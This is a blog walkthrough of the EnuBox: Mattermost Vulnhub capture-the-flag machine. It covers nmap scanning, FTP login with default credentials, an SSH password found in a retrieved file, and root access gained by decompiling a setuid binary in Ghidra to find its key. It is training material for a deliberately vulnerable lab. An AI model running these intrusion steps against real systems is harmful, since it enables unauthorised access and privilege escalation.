EnuBox Mattermost Walkthrough Vulnhub CTF

Today we are solving enubox: mattermost is created by Avraham Cohen

Description: The Mattermost chatting system may or may not hold sensitive information. Can you find your way in? EnuBox

EnuBox: Mattermost Download

First, step is finding our target IP address using Netdiscover Toll

netdiscover
EnuBox Mattermost Walkthrough
NMAP

( A network mapping tool that allows you to scan for open ports, services, and operating systems to list a few features. )

Now scanning our target Machine IP address with Nmap network mapping tool and using the parameter -A ( aggressive scan )

nmap -A 192.168.0.105
EnuBox Mattermost Walkthrough

After scanning our target IP address we see many ports are open but port 21 FTP is allowing login with the default username and password

connecting FTP anonymous username password

ftp 192.168.0.105
  • ftp
  • ftp
EnuBox Mattermost Walkthrough

Enumerating port 80 HTTP service running I opening the IP address our firefox browser and this web site is showing 404 Access forbidden and information Details or Servername “mattermost”

http://192.168.0.105
EnuBox Mattermost Walkthrough

Sometime later I am trying to FTP login with username ftpuser and password ftppassword and me successful login FTP connection

ftp 192.168.0.105
  • ftpuser
  • ftppassword
EnuBox Mattermost Walkthrough

Enumerating Directory FTP

ls
cd users
ls
cd mettermost
ls
get message

After enumerating many directories we got a message txt file mattermost directory I download the file our local system and opening the txt file.

EnuBox Mattermost Walkthrough
ls
cat message

I am trying the message text for password login ssh connection and we already see the browser server name

ssh [email protected]

I am trying to the login ssh connection

  • username: mattermost
  • password: Welcome!!!

logging Succesful ssh connection trying to enumerate the system directory and files

id
EnuBox Mattermost Walkthrough
cd Desktop
ls
cat README.md
EnuBox Mattermost Walkthrough

we see a secret file mattermost Desktop directory now run the file and we see a secret file key error

./secret

Downloading the secret file our local system I am starting local PHP server port 4545 ( php -S targetvmip: any port number

php -S 192.168.0.105:4545

download the secret file with wget command our local system

wget http://192.168.0.105:4545/secret

After Download the secret file decompiling the c++ file using tool ghidra after analysis the code we found an if-else condition with a hax value 0xf447

converting the hax value to a decimal using an online website

again run the script and type key our Decimal number value 62535 and we see our user is changed to root user

./secret
id
cd /root
cd Desktop/
ls

we found a text file named local.txt. Upon opening the file, we see the our last flag

cat local.txt
Os-Hacknos-3 Walkthrough see here

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →